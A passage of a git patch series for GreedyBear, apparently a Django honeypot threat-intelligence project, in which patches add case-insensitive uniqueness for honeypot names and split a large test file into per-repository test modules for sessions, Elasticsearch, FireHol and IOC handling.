+    def test_get_or_create_without_reason(self):
+        scanner, created = self.repo.get_or_create("7.7.7.7")
+
+        self.assertTrue(created)
+        self.assertEqual(scanner.ip_address, "7.7.7.7")
+        self.assertEqual(scanner.reason, "")

From 6bb224b304ca586d124906637292d0e0efc41328 Mon Sep 17 00:00:00 2001
From: Drona Raj Gyawali <dronarajgyawali@gmail.com>
Date: Tue, 13 Jan 2026 20:58:26 +0545
Subject: [PATCH 42/75] refactor : honeypot creation and enforce
 case-insensitive uniqueness . Closes #689 (#693)

* refactor(repository): enforce case-insensitive uniqueness and handle IntegrityError

* refactor: code

* refactor: create_honeypot doc & log addition
---
 greedybear/cronjobs/repositories/ioc.py       | 26 ++++++---
 ...honeypot_unique_generalhoneypot_name_ci.py | 18 +++++++
 greedybear/models.py                          |  4 ++
 tests/__init__.py                             |  6 +--
 tests/test_repositories.py                    | 54 +++++++++++++++++--
 5 files changed, 96 insertions(+), 12 deletions(-)
 create mode 100644 greedybear/migrations/0028_generalhoneypot_unique_generalhoneypot_name_ci.py

diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index f2fdb3a2..29032cea 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -1,6 +1,7 @@
 import logging
 
 from django.contrib.postgres.aggregates import ArrayAgg
+from django.db import IntegrityError
 from django.db.models import F, Q
 
 from greedybear.models import IOC, GeneralHoneypot
@@ -46,19 +47,32 @@ def add_honeypot_to_ioc(self, honeypot_name: str, ioc: IOC) -> IOC:
 
     def create_honeypot(self, honeypot_name: str) -> GeneralHoneypot:
         """
-        Create a new honeypot and save it to the database.
+        Create a new honeypot or return an existing one.
+
+        If a honeypot with the same name (case-insensitive) already exists,
+        recover and return the existing one instead. This method also updates
+        the internal honeypot cache accordingly.
 
         Args:
             honeypot_name: Name for the new honeypot.
 
         Returns:
-            The newly created GeneralHoneypot instance.
+            A GeneralHoneypot instance (newly created or existing).
         """
         normalized = self._normalize_name(honeypot_name)
-        self.log.debug(f"creating honeypot {honeypot_name}")
-        honeypot = GeneralHoneypot(name=honeypot_name, active=True)
-        honeypot.save()
-        self._honeypot_cache[normalized] = True
+
+        try:
+            honeypot = GeneralHoneypot.objects.create(
+                name=honeypot_name,
+                active=True,
+            )
+        except IntegrityError as e:
+            self.log.error(f"IntegrityError creating honeypot '{honeypot_name}': {e}")
+            honeypot = self.get_hp_by_name(honeypot_name)
+            if honeypot is None:
+                raise e
+
+        self._honeypot_cache[normalized] = honeypot.active
         return honeypot
 
     def get_active_honeypots(self) -> list[GeneralHoneypot]:
diff --git a/greedybear/migrations/0028_generalhoneypot_unique_generalhoneypot_name_ci.py b/greedybear/migrations/0028_generalhoneypot_unique_generalhoneypot_name_ci.py
new file mode 100644
index 00000000..707c256e
--- /dev/null
+++ b/greedybear/migrations/0028_generalhoneypot_unique_generalhoneypot_name_ci.py
@@ -0,0 +1,18 @@
+# Generated by Django 5.2.8 on 2026-01-09 15:53
+
+import django.db.models.functions.text
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ('greedybear', '0027_disable_unwanted_honeypots'),
+    ]
+
+    operations = [
+        migrations.AddConstraint(
+            model_name='generalhoneypot',
+            constraint=models.UniqueConstraint(django.db.models.functions.text.Lower('name'), name='unique_generalhoneypot_name_ci'),
+        ),
+    ]
diff --git a/greedybear/models.py b/greedybear/models.py
index 6221e58f..2f0d6a76 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -4,6 +4,7 @@
 
 from django.contrib.postgres import fields as pg_fields
 from django.db import models
+from django.db.models.functions import Lower
 
 
 class ViewType(models.TextChoices):
@@ -29,6 +30,9 @@ class GeneralHoneypot(models.Model):
     name = models.CharField(max_length=15, blank=False)
     active = models.BooleanField(blank=False, default=True)
 
+    class Meta:
+        constraints = [models.UniqueConstraint(Lower("name"), name="unique_generalhoneypot_name_ci")]
+
     def __str__(self):
         return self.name
 
diff --git a/tests/__init__.py b/tests/__init__.py
index 6cb71ac9..a22d4d87 100644
--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -19,9 +19,9 @@ class CustomTestCase(TestCase):
     def setUpTestData(cls):
         super().setUpTestData()
 
-        cls.heralding = GeneralHoneypot.objects.create(name="Heralding", active=True)
-        cls.ciscoasa = GeneralHoneypot.objects.create(name="Ciscoasa", active=True)
-        cls.ddospot = GeneralHoneypot.objects.create(name="Ddospot", active=False)
+        cls.heralding = GeneralHoneypot.objects.get_or_create(name="Heralding", defaults={"active": True})[0]
+        cls.ciscoasa = GeneralHoneypot.objects.get_or_create(name="Ciscoasa", defaults={"active": True})[0]
+        cls.ddospot = GeneralHoneypot.objects.get_or_create(name="Ddospot", defaults={"active": False})[0]
 
         cls.current_time = datetime.now()
         cls.ioc = IOC.objects.create(
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index 167e70d2..ff2647d0 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -1,7 +1,7 @@
 from datetime import datetime
 from unittest.mock import Mock, patch
 
-from django.db import IntegrityError
+from django.db import IntegrityError, transaction
 
 from greedybear.cronjobs.repositories import (
     CowrieSessionRepository,
@@ -161,11 +161,11 @@ def test_get_hp_by_name_insensitive(self):
         self.assertIsNotNone(result)
 
     def test_disabled_honeypot_case_insensitive(self):
-        GeneralHoneypot.objects.create(name="Heralding", active=False)
+        GeneralHoneypot.objects.create(name="Testpot69", active=False)
 
         # reiniting repo after DB change to refresh the cache
         repo = IocRepository()
-        result = repo.is_ready_for_extraction("heralding")
+        result = repo.is_ready_for_extraction("testpot69")
         self.assertFalse(result)
 
     def test_special_and_normal_honeypots(self):
@@ -178,6 +178,54 @@ def test_special_and_normal_honeypots(self):
         self.assertFalse(repo.is_ready_for_extraction("NormalPot"))
         self.assertFalse(repo.is_ready_for_extraction("normalpot"))
 
+    def test_create_honeypot_case_insensitive_uniqueness(self):
+        initial_count = GeneralHoneypot.objects.count()
+        GeneralHoneypot.objects.create(name="TestPot123", active=True)
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+        with self.assertRaises(IntegrityError):
+            with transaction.atomic():
+                GeneralHoneypot.objects.create(name="testpot123", active=True)
+
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+        self.assertEqual(GeneralHoneypot.objects.get(name__iexact="testpot123").name, "TestPot123")
+
+    def test_create_honeypot_integrity_error_handling(self):
+        initial_count = GeneralHoneypot.objects.count()
+        GeneralHoneypot.objects.create(name="Log4PotTest123", active=True)
+
+        try:
+            with transaction.atomic():
+                GeneralHoneypot.objects.create(name="log4pottest123", active=True)
+        except IntegrityError:
+            hp = GeneralHoneypot.objects.filter(name__iexact="log4pottest123").first()
+
+        self.assertEqual(hp.name, "Log4PotTest123")
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
+    def test_create_new_honeypot_creates_and_updates_cache(self):
+        self.repo._honeypot_cache.clear()
+        hp = self.repo.create_honeypot("UniqueNewPot123")
+        self.assertEqual(hp.name, "UniqueNewPot123")
+        self.assertTrue("uniquenewpot123" in self.repo._honeypot_cache)
+        self.assertTrue(hp.active)
+
+        db_hp = GeneralHoneypot.objects.get(name="UniqueNewPot123")
+        self.assertEqual(db_hp.name, "UniqueNewPot123")
+        self.assertTrue(db_hp.active)
+
+    def test_honeypot_unique_constraint_case_insensitive(self):
+        initial_count = GeneralHoneypot.objects.count()
+        hp1 = self.repo.create_honeypot("TestPot456")
+        self.assertIsNotNone(hp1)
+
+        with self.assertRaises(IntegrityError):
+            with transaction.atomic():
+                GeneralHoneypot.objects.create(name="testpot456", active=True)
+
+        self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="testpot456").count(), 1)
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
+
     def test_get_scanners_for_scoring_returns_scanners(self):
         # Create scanners
         IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)

From 85b6948d60d2107b20c05bce1a163c946010b9a9 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 13 Jan 2026 22:10:45 +0530
Subject: [PATCH 43/75] Split test_repositories.py into separate files for
 better maintainability. Closes #703 (#704)

* Split test_repositories.py into separate files (#703)

- Split 1111-line test_repositories.py into 6 focused test files
- test_ioc_repository.py (561 lines): IOC and scoring tests
- test_sensor_repository.py (58 lines): Sensor tests
- test_cowrie_session_repository.py (175 lines): Cowrie session tests
- test_elastic_repository.py (224 lines): Elasticsearch tests
- test_firehol_repository.py (39 lines): FireHol tests
- test_mass_scanner_repository.py (37 lines): Mass scanner tests
- All 101 tests pass successfully
- Improved maintainability and navigation

* Use assertIn instead of assertTrue for better error messages

Applied Copilot suggestion to improve test assertion readability.
Replace assertTrue(x in y) with assertIn(x, y) for more informative
error messages when tests fail.
---
 tests/test_cowrie_session_repository.py |  175 ++++
 tests/test_elastic_repository.py        |  224 +++++
 tests/test_firehol_repository.py        |   39 +
 tests/test_ioc_repository.py            |  561 ++++++++++++
 tests/test_mass_scanner_repository.py   |   37 +
 tests/test_repositories.py              | 1111 -----------------------
 tests/test_sensor_repository.py         |   58 ++
 7 files changed, 1094 insertions(+), 1111 deletions(-)
 create mode 100644 tests/test_cowrie_session_repository.py
 create mode 100644 tests/test_elastic_repository.py
 create mode 100644 tests/test_firehol_repository.py
 create mode 100644 tests/test_ioc_repository.py
 create mode 100644 tests/test_mass_scanner_repository.py
 delete mode 100644 tests/test_repositories.py
 create mode 100644 tests/test_sensor_repository.py

diff --git a/tests/test_cowrie_session_repository.py b/tests/test_cowrie_session_repository.py
new file mode 100644
index 00000000..3f245a9c
--- /dev/null
+++ b/tests/test_cowrie_session_repository.py
@@ -0,0 +1,175 @@
+from datetime import datetime, timedelta
+
+from django.db import IntegrityError
+
+from greedybear.cronjobs.repositories import CowrieSessionRepository
+from greedybear.models import IOC, CommandSequence, CowrieSession
+
+from . import CustomTestCase
+
+
+class TestCowrieSessionRepository(CustomTestCase):
+    def setUp(self):
+        self.repo = CowrieSessionRepository()
+
+    def test_get_or_create_session_creates_new(self):
+        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        result = self.repo.get_or_create_session(session_id="123456", source=source_ioc)
+        self.assertIsNotNone(result)
+        self.assertEqual(result.session_id, int("123456", 16))
+        self.assertEqual(result.source, source_ioc)
+
+    def test_get_or_create_session_returns_existing(self):
+        existing_session_id = "ffffffffffff"
+        source = self.cowrie_session.source
+        result = self.repo.get_or_create_session(existing_session_id, source=source)
+        self.assertEqual(result.pk, int(existing_session_id, 16))
+        self.assertTrue(result.login_attempt)
+
+    def test_get_or_create_raises_on_invalid_session_id(self):
+        session_id = "gggggggggggg"
+        source = IOC.objects.create(name="1.2.3.4", type="ip")
+        with self.assertRaises(ValueError):
+            self.repo.get_or_create_session(session_id, source=source)
+
+    def test_save_session_persists_to_database(self):
+        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        session = CowrieSession(session_id=12345, source=source_ioc)
+        result = self.repo.save_session(session)
+        self.assertIsNotNone(result.pk)
+        self.assertTrue(CowrieSession.objects.filter(session_id=12345).exists())
+
+    def test_save_session_updates_existing(self):
+        existing_session_id = "ffffffffffff"
+        source = self.cowrie_session.source
+        session = self.repo.get_or_create_session(existing_session_id, source=source)
+
+        original_interaction_count = session.interaction_count
+        session.interaction_count = 10
+        result = self.repo.save_session(session)
+        self.assertEqual(result.interaction_count, 10)
+        self.assertEqual(
+            CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
+            10,
+        )
+
+        session.interaction_count = original_interaction_count
+        result = self.repo.save_session(session)
+        self.assertEqual(result.interaction_count, original_interaction_count)
+        self.assertEqual(
+            CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count,
+            original_interaction_count,
+        )
+
+    def test_get_command_sequence_by_hash_returns_existing(self):
+        existing = self.command_sequence
+        result = self.repo.get_command_sequence_by_hash(existing.commands_hash)
+        self.assertIsNotNone(result)
+        self.assertEqual(result.pk, existing.pk)
+        self.assertEqual(result.commands_hash, existing.commands_hash)
+
+    def test_get_command_sequence_by_hash_returns_none_for_missing(self):
+        result = self.repo.get_command_sequence_by_hash("nonexistent")
+        self.assertIsNone(result)
+
+    def test_save_command_sequence_persists_to_database(self):
+        cmd_seq = CommandSequence(
+            commands=["ls", "pwd", "whoami"],
+            commands_hash="def456",
+        )
+        result = self.repo.save_command_sequence(cmd_seq)
+        self.assertIsNotNone(result.pk)
+        self.assertTrue(CommandSequence.objects.filter(commands_hash="def456").exists())
+
+    def test_save_command_sequence_updates_existing(self):
+        existing = self.command_sequence
+        existing.last_seen = datetime(2025, 1, 2)
+        self.repo.save_command_sequence(existing)
+        updated = CommandSequence.objects.get(commands_hash=existing.commands_hash)
+        self.assertEqual(updated.last_seen.date(), datetime(2025, 1, 2).date())
+
+    def test_get_or_create_session_with_hex_session_id(self):
+        session_id = "abc123"
+        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        result = self.repo.get_or_create_session(session_id=session_id, source=source_ioc)
+        self.assertEqual(result.session_id, int(session_id, 16))
+
+    def test_command_sequence_unique_hash_constraint(self):
+        existing = self.command_sequence
+        with self.assertRaises(IntegrityError):
+            CommandSequence.objects.create(
+                commands=["different", "commands"],
+                commands_hash=existing.commands_hash,
+            )
+
+
+class TestCowrieSessionRepositoryCleanup(CustomTestCase):
+    """Tests for cleanup-related methods in CowrieSessionRepository."""
+
+    def setUp(self):
+        self.repo = CowrieSessionRepository()
+
+    def test_delete_old_command_sequences(self):
+        old_date = datetime.now() - timedelta(days=40)
+        recent_date = datetime.now() - timedelta(days=5)
+
+        CommandSequence.objects.create(commands=["ls"], commands_hash="old_hash", last_seen=old_date)
+        CommandSequence.objects.create(commands=["pwd"], commands_hash="recent_hash", last_seen=recent_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_old_command_sequences(cutoff)
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(CommandSequence.objects.filter(commands_hash="old_hash").exists())
+        self.assertTrue(CommandSequence.objects.filter(commands_hash="recent_hash").exists())
+
+    def test_delete_incomplete_sessions(self):
+        source = IOC.objects.create(name="1.2.3.4", type="ip")
+
+        CowrieSession.objects.create(session_id=123, source=source, start_time=None)
+        CowrieSession.objects.create(session_id=456, source=source, start_time=datetime.now())
+
+        deleted_count = self.repo.delete_incomplete_sessions()
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(CowrieSession.objects.filter(session_id=123).exists())
+        self.assertTrue(CowrieSession.objects.filter(session_id=456).exists())
+
+    def test_delete_sessions_without_login(self):
+        source = IOC.objects.create(name="1.2.3.4", type="ip")
+        old_date = datetime.now() - timedelta(days=40)
+        recent_date = datetime.now() - timedelta(days=5)
+
+        # Old session without login
+        CowrieSession.objects.create(session_id=111, source=source, start_time=old_date, login_attempt=False)
+        # Recent session without login
+        CowrieSession.objects.create(session_id=222, source=source, start_time=recent_date, login_attempt=False)
+        # Old session with login
+        CowrieSession.objects.create(session_id=333, source=source, start_time=old_date, login_attempt=True)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_sessions_without_login(cutoff)
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(CowrieSession.objects.filter(session_id=111).exists())
+        self.assertTrue(CowrieSession.objects.filter(session_id=222).exists())
+        self.assertTrue(CowrieSession.objects.filter(session_id=333).exists())
+
+    def test_delete_sessions_without_commands(self):
+        source = IOC.objects.create(name="1.2.3.4", type="ip")
+        old_date = datetime.now() - timedelta(days=40)
+
+        # Session without commands
+        CowrieSession.objects.create(session_id=777, source=source, start_time=old_date)
+        # Session with commands
+        session_with_cmd = CowrieSession.objects.create(session_id=888, source=source, start_time=old_date)
+        cmd_seq = CommandSequence.objects.create(commands=["ls"], commands_hash="hash1")
+        session_with_cmd.commands = cmd_seq
+        session_with_cmd.save()
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_sessions_without_commands(cutoff)
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(CowrieSession.objects.filter(session_id=777).exists())
+        self.assertTrue(CowrieSession.objects.filter(session_id=888).exists())
diff --git a/tests/test_elastic_repository.py b/tests/test_elastic_repository.py
new file mode 100644
index 00000000..54cd92ea
--- /dev/null
+++ b/tests/test_elastic_repository.py
@@ -0,0 +1,224 @@
+from datetime import datetime
+from unittest.mock import Mock, patch
+
+from greedybear.cronjobs.repositories import ElasticRepository, get_time_window
+
+from . import CustomTestCase
+
+
+class TestElasticRepository(CustomTestCase):
+    def setUp(self):
+        self.mock_client = Mock()
+        self.mock_client.ping.return_value = True
+
+        patcher = patch("greedybear.cronjobs.repositories.elastic.settings")
+        self.mock_settings = patcher.start()
+        self.mock_settings.ELASTIC_CLIENT = self.mock_client
+        self.addCleanup(patcher.stop)
+
+        self.repo = ElasticRepository()
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    def test_has_honeypot_been_hit_returns_true_when_hits_exist(self, mock_search_class):
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_q = Mock()
+        with patch.object(self.repo, "_standard_query", return_value=mock_q):
+            mock_search.query.return_value = mock_search
+            mock_search.filter.return_value = mock_search
+            mock_search.count.return_value = 1
+
+            result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+            self.assertTrue(result)
+            mock_search.query.assert_called_once_with(mock_q)
+            mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+            mock_search.count.assert_called_once()
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    def test_has_honeypot_been_hit_returns_false_when_no_hits(self, mock_search_class):
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_q = Mock()
+        with patch.object(self.repo, "_standard_query", return_value=mock_q):
+            mock_search.query.return_value = mock_search
+            mock_search.filter.return_value = mock_search
+            mock_search.count.return_value = 0
+
+            result = self.repo.has_honeypot_been_hit(minutes_back_to_lookup=10, honeypot_name="test_honeypot")
+
+            self.assertFalse(result)
+            mock_search.query.assert_called_once_with(mock_q)
+            mock_search.filter.assert_called_once_with("term", **{"type.keyword": "test_honeypot"})
+            mock_search.count.assert_called_once()
+
+    def test_healthcheck_passes_when_ping_succeeds(self):
+        self.mock_client.ping.return_value = True
+        self.repo._healthcheck()
+        self.mock_client.ping.assert_called_once()
+
+    def test_healthcheck_raises_when_ping_fails(self):
+        self.mock_client.ping.return_value = False
+        with self.assertRaises(ElasticRepository.ElasticServerDownError) as ctx:
+            self.repo._healthcheck()
+        self.assertIn("not reachable", str(ctx.exception))
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+    def test_search_returns_cached_list_not_generator(self, mock_search_class):
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+
+        mock_hits = [{"name": f"hit{i}", "@timestamp": i} for i in range(20_000)]
+        mock_search.scan.return_value = iter(mock_hits)
+
+        first_iteration = list(self.repo.search(minutes_back_to_lookup=10))
+        second_iteration = list(self.repo.search(minutes_back_to_lookup=10))
+        self.assertEqual(len(first_iteration), 20_000)
+        self.assertEqual(len(second_iteration), 20_000)
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+    def test_search_returns_ordered_list(self, mock_search_class):
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+
+        mock_hits = [{"name": f"hit{i}", "@timestamp": i % 7} for i in range(20_000)]
+        mock_search.scan.return_value = iter(mock_hits)
+
+        result = list(self.repo.search(minutes_back_to_lookup=10))
+        is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:], strict=False))
+        self.assertTrue(is_ordered)
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", True)
+    def test_search_legacy_mode_uses_relative_time(self, mock_search_class):
+        """Test legacy extraction uses relative time queries"""
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+        mock_search.scan.return_value = iter([])
+
+        # Verify query was called (legacy mode uses different query structure)
+        self.repo.search(minutes_back_to_lookup=11)
+        mock_search.query.assert_called_once()
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+    def test_search_non_legacy_uses_time_window(self, mock_get_time_window, mock_search_class):
+        """Test non-legacy extraction uses get_time_window"""
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+        mock_search.scan.return_value = iter([])
+
+        window_start = datetime(2025, 1, 1, 12, 0, 0)
+        window_end = datetime(2025, 1, 1, 12, 10, 0)
+        mock_get_time_window.return_value = (window_start, window_end)
+
+        self.repo.search(minutes_back_to_lookup=10)
+
+        mock_get_time_window.assert_called_once()
+
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+    @patch("greedybear.cronjobs.repositories.elastic.datetime")
+    def test_standard_query_returns_correct_query(self, mock_datetime, mock_get_time_window):
+        now = datetime(2023, 1, 1, 0, 0, 0)
+        mock_datetime.now.return_value = now
+        window_start = "2022-12-31T23:50:00"
+        window_end = "2023-01-01T00:00:00"
+        mock_get_time_window.return_value = (window_start, window_end)
+
+        q = self.repo._standard_query(minutes_back_to_lookup=10)
+
+        expected_dict = {"range": {"@timestamp": {"gte": window_start, "lt": window_end}}}
+        self.assertEqual(q.to_dict(), expected_dict)
+        mock_get_time_window.assert_called_once_with(now, 10)
+
+
+class TestTimeWindowCalculation(CustomTestCase):
+    def test_basic_10min_window(self):
+        """Test a basic window without custom lookback"""
+        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
+        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
+        expected_start = datetime(2024, 1, 10, 14, 10)  # 14:10
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_with_custom_lookback(self):
+        """Test window with custom lookback time"""
+        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
+        start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
+        expected_start = datetime(2024, 1, 10, 14, 5)  # 14:05
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_with_custom_extraction_interval(self):
+        """Test window with custom extraction interval time"""
+        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
+        start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=15)
+
+        expected_end = datetime(2024, 1, 10, 14, 15)  # 14:15
+        expected_start = datetime(2024, 1, 10, 14, 00)  # 14:00
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_exact_boundary(self):
+        """Test behavior when reference time is exactly on a window boundary"""
+        reference = datetime(2024, 1, 10, 14, 20)  # 14:20 exactly
+        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
+        expected_start = datetime(2024, 1, 10, 14, 10)  # 14:10
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_invalid_lookback(self):
+        """Test that function raises ValueError for invalid lookback"""
+        reference = datetime(2024, 1, 10, 14, 23)
+
+        with self.assertRaises(ValueError):
+            get_time_window(reference, lookback_minutes=5, extraction_interval=10)
+
+    def test_invalid_extraction_interval(self):
+        """Test that function raises ValueError for invalid extraction interval"""
+        reference = datetime(2024, 1, 10, 14, 23)
+
+        with self.assertRaises(ValueError):
+            get_time_window(reference, lookback_minutes=10, extraction_interval=9)
+
+    def test_day_boundary_crossing(self):
+        """Test behavior when window crosses a day boundary"""
+        reference = datetime(2024, 1, 11, 0, 5)  # 00:00
+        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 11, 0, 0)  # 00:00
+        expected_start = datetime(2024, 1, 10, 23, 50)  # 23:50 on previous day
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_large_lookback(self):
+        """Test with a large lookback that crosses multiple days"""
+        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
+        start, end = get_time_window(reference, lookback_minutes=60 * 24 * 3, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
+        expected_start = datetime(2024, 1, 7, 14, 20)  # 14:20, 3 days earlier
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
diff --git a/tests/test_firehol_repository.py b/tests/test_firehol_repository.py
new file mode 100644
index 00000000..11317194
--- /dev/null
+++ b/tests/test_firehol_repository.py
@@ -0,0 +1,39 @@
+from datetime import datetime, timedelta
+
+from greedybear.cronjobs.repositories import FireHolRepository
+from greedybear.models import FireHolList
+
+from . import CustomTestCase
+
+
+class TestFireHolRepository(CustomTestCase):
+    """Tests for FireHolRepository."""
+
+    def setUp(self):
+        self.repo = FireHolRepository()
+
+    def test_get_or_create_creates_new_entry(self):
+        entry, created = self.repo.get_or_create("1.2.3.4", "blocklist_de")
+
+        self.assertTrue(created)
+        self.assertEqual(entry.ip_address, "1.2.3.4")
+        self.assertEqual(entry.source, "blocklist_de")
+        self.assertTrue(FireHolList.objects.filter(ip_address="1.2.3.4", source="blocklist_de").exists())
+
+    def test_get_or_create_returns_existing(self):
+        FireHolList.objects.create(ip_address="5.6.7.8", source="greensnow")
+
+        entry, created = self.repo.get_or_create("5.6.7.8", "greensnow")
+
+        self.assertFalse(created)
+        self.assertEqual(entry.ip_address, "5.6.7.8")
+        self.assertEqual(FireHolList.objects.filter(ip_address="5.6.7.8", source="greensnow").count(), 1)
+
+    def test_cleanup_old_entries_custom_days(self):
+        old_date = datetime.now() - timedelta(days=65)
+        old_entry = FireHolList.objects.create(ip_address="4.4.4.4", source="test")
+        FireHolList.objects.filter(pk=old_entry.pk).update(added=old_date)
+
+        deleted_count = self.repo.cleanup_old_entries(days=60)
+
+        self.assertEqual(deleted_count, 1)
diff --git a/tests/test_ioc_repository.py b/tests/test_ioc_repository.py
new file mode 100644
index 00000000..56ec7b7f
--- /dev/null
+++ b/tests/test_ioc_repository.py
@@ -0,0 +1,561 @@
+from datetime import datetime, timedelta
+from unittest.mock import Mock
+
+from django.db import IntegrityError, transaction
+
+from greedybear.cronjobs.repositories import IocRepository
+from greedybear.models import IOC, GeneralHoneypot
+
+from . import CustomTestCase
+
+
+class TestIocRepository(CustomTestCase):
+    def setUp(self):
+        self.repo = IocRepository()
+
+    def test_get_ioc_by_name_returns_existing(self):
+        result = self.repo.get_ioc_by_name("140.246.171.141")
+        self.assertIsNotNone(result)
+        self.assertEqual(result.name, "140.246.171.141")
+
+    def test_get_ioc_by_name_returns_none_for_missing(self):
+        result = self.repo.get_ioc_by_name("8.8.8.8")
+        self.assertIsNone(result)
+
+    def test_save_creates_new_ioc(self):
+        ioc = IOC(name="1.2.3.4", type="ip")
+        result = self.repo.save(ioc)
+        self.assertIsNotNone(result.pk)
+        self.assertTrue(IOC.objects.filter(name="1.2.3.4").exists())
+
+    def test_save_updates_existing_ioc(self):
+        ioc = self.repo.get_ioc_by_name("140.246.171.141")
+        original_attack_count = ioc.attack_count
+
+        ioc.attack_count = 10
+        result = self.repo.save(ioc)
+        self.assertEqual(result.attack_count, 10)
+        self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, 10)
+
+        ioc.attack_count = original_attack_count
+        result = self.repo.save(ioc)
+        self.assertEqual(result.attack_count, original_attack_count)
+        self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, original_attack_count)
+
+    def test_create_honeypot(self):
+        self.repo.create_honeypot("NewHoneypot")
+        self.assertTrue(GeneralHoneypot.objects.filter(name="NewHoneypot").exists())
+        hp = GeneralHoneypot.objects.get(name="NewHoneypot")
+        self.assertTrue(hp.active)
+
+    def test_get_active_honeypots_returns_only_active(self):
+        GeneralHoneypot.objects.create(name="TestActivePot1", active=True)
+        GeneralHoneypot.objects.create(name="TestActivePot2", active=True)
+        GeneralHoneypot.objects.create(name="TestInactivePot", active=False)
+
+        result = self.repo.get_active_honeypots()
+        names = [hp.name for hp in result]
+
+        self.assertIn("TestActivePot1", names)
+        self.assertIn("TestActivePot2", names)
+        self.assertNotIn("TestInactivePot", names)
+
+    def test_get_active_honeypots_returns_empty_if_none_active(self):
+        GeneralHoneypot.objects.update(active=False)
+
+        result = self.repo.get_active_honeypots()
+        self.assertEqual(len(result), 0)
+
+        GeneralHoneypot.objects.update(active=True)
+
+    def test_get_hp_by_name_returns_existing(self):
+        GeneralHoneypot.objects.create(name="TestPot", active=True)
+        result = self.repo.get_hp_by_name("TestPot")
+        self.assertIsNotNone(result)
+        self.assertEqual(result.name, "TestPot")
+
+    def test_get_hp_by_name_returns_none_for_missing(self):
+        result = self.repo.get_hp_by_name("nonexistent")
+        self.assertIsNone(result)
+
+    def test_is_empty_returns_false_when_has_iocs(self):
+        result = self.repo.is_empty()
+        self.assertFalse(result)
+
